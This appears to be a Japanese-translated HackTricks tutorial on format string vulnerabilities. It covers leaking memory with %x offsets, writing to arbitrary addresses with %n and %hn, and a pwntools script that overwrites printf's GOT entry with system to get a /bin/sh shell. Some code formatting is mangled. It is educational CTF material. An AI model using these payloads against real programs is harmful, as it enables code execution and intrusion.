Format Strings

```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

Iterate over a range of integers

for i in range(10):

Construct a payload that includes the current integer as offset

payload = f"AAAA%{i}$x".encode()

Start a new process of the "chall" binary

p = process("./chall")

Send the payload to the process

p.sendline(payload)

Read and store the output of the process

output = p.clean()

Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output

if b"41414141" in output:

If the string is found, log the success message and break out of the loop

log.success(f"User input is at offset : {i}") break

Close the process

p.close()

</details>

### どれほど役立つか

任意の読み取りは以下に役立ちます：

* **メモリから** **バイナリ**を**ダンプ**する
* **機密** **情報**が保存されているメモリの特定の部分に**アクセス**する（例えば、この[**CTFチャレンジ**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)のように、カナリア、暗号化キー、またはカスタムパスワードなど）

## **任意の書き込み**

フォーマッタ **`%<num>$n`** は、スタックの\<num>パラメータで指定されたアドレスに**書き込まれたバイト数**を**書き込みます**。攻撃者がprintfを使って任意の数の文字を書き込むことができれば、**`%<num>$n`** を使って任意のアドレスに任意の数を**書き込む**ことができます。

幸いなことに、9999という数を書くために、入力に9999個の"A"を追加する必要はなく、フォーマッタ **`%.<num-write>%<num>$n`** を使用して、**`<num-write>`** の数を**`num`位置で指し示されるアドレス**に書き込むことが可能です。
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

しかし、通常、0x08049724のようなアドレスを書くためには（これは一度に書くには非常に大きな数です）、**$hnが$n**の代わりに使用されます。これにより、2バイトだけを書くことができます。したがって、この操作は2回行われ、アドレスの最上位2バイトと最下位2バイトのそれぞれに対して行われます。

したがって、この脆弱性は任意のアドレスに何でも書き込むことを可能にします（任意書き込み）。

この例では、目標は後で呼び出される関数のアドレスを上書きすることです。これは他の任意書き込みからexec技術を悪用することもできます：

私たちは、ユーザーから引数を受け取る関数を上書きし、それを**system関数にポイントします。 前述のように、アドレスを書くためには通常2ステップが必要です：最初にアドレスの2バイトを書き、その後に残りの2バイトを書きます。そのために$hn**が使用されます。

• HOBはアドレスの上位2バイトに呼び出されます

• LOBはアドレスの下位2バイトに呼び出されます

次に、フォーマット文字列の動作のために、最初に[HOB, LOB]の中で最小のものを書く必要があります、その後にもう一方を書きます。

もしHOB < LOB [address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

もしHOB > LOB [address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Pwntools テンプレート

この種の脆弱性に対するエクスプロイトを準備するためのテンプレートは、以下にあります:

または、こちらの基本的な例もあります:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

フォーマット文字列からBOFへ

フォーマット文字列の脆弱性の書き込みアクションを悪用して、スタックのアドレスに書き込むことが可能であり、バッファオーバーフロータイプの脆弱性を悪用することができます。

その他の例と参考文献

• https://ir0nstone.gitbook.io/notes/types/stack/format-string

• https://www.youtube.com/watch?v=t1LH9D5cuK4

• https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

• https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html

• 32ビット、relroなし、canaryなし、nx、pieなし、スタックからフラグを漏洩させるためのフォーマット文字列の基本的な使用（実行フローを変更する必要はありません）

• https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html

• 32ビット、relroあり、canaryなし、nx、pieなし、win関数でfflushのアドレスを上書きするためのフォーマット文字列（ret2win）

• https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html

• 32ビット、relroあり、canaryなし、nx、pieなし、.fini_array内のmainのアドレスに書き込むためのフォーマット文字列（フローがもう1回ループバックするように）およびstrlenを指すGOTテーブル内のsystemへのアドレスを書き込む。フローがmainに戻ると、strlenがユーザー入力で実行され、systemを指すと、渡されたコマンドが実行されます。

ハッキングキャリアに興味があり、ハッキング不可能なものをハッキングしたい方 - 私たちは採用しています！ (流暢なポーランド語の読み書きが必要です)。

HackTricksをサポートする

• サブスクリプションプランをチェックしてください！

• **💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。

• ハッキングのトリックを共有するために、 HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。